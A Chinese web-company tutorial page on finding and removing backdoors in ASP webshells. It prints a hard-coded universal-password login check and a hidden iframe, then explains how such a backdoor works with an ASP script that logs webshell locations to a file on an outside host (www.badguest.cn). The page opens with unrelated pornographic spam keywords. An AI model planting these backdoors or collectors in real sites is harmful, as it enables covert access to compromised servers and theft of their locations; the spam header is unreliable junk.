欧美激情网,国产欧美亚洲高清,欧美屁股xxxxx,欧美群妇大交群,欧美人与物ⅴideos另类,区二区三区在线 | 欧洲

知識學(xué)堂
  • ·聯(lián)系電話:+86.023-75585550
  • ·聯(lián)系傳真:+86.023-75585550
  • ·24小時(shí)手機(jī):13896886023
  • ·QQ 咨 詢:361652718 513960520
當(dāng)前位置 > 首頁 > 知識學(xué)堂 > 網(wǎng)站建設(shè)知識
asp木馬上留后門的檢測和原理
更新時(shí)間:2012-02-02 | 發(fā)布人:本站 | 點(diǎn)擊率:687

 通常加了后門的為了隱秘性,都會加密!所以首先我們要先解密asp木馬解密工具

 
 
解密后先檢查有無萬能密碼,也就是說就算你改了木馬的密碼,他也能用這個(gè)密碼來登錄
 
正常的:
 
EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"對不起,密碼驗(yàn)證失敗!"
 
加有萬能密碼的:
 
EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"對不起,密碼驗(yàn)證失敗!"
 
1111111就是傳說中的萬能密碼了。
 
找到萬能密碼代碼后把or request.form("pass")="1111111" 刪除就OK了!
 
下面來找馬大多數(shù)都喜歡用框架掛馬:<iframe src=后門地址width=0 height=0></iframe>
 
找到后刪了,到此asp后門就算剔除了!
 
 
下面教大家后門的原理:
 
這是一段收信的asp代碼將其保存為1.asp
 
<%url=Request.ServerVariables("HTTP_Referer")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)
file.writeline url
file.close www.xxx.com
set file=nothing
set fs=nothing
%>
 
代碼基本意思就是:“HTTP_REFERER” 鏈接到當(dāng)前頁面的前一頁面的URL 地址
簡單來說就是獲得webshell的地址然后記錄在bobo.txt這里文本里
 
上傳到空間比如http://www.badguest.cn /1.asp
 
然后里用
 
<iframe src=http://www.badguest.cn /1.asp width=0 height=0></iframe>
 
插到asp木馬中
 
那么別人訪問這個(gè)被掛了馬的asp木馬就會生成個(gè)bobo.txt里面就會有asp大馬的路徑了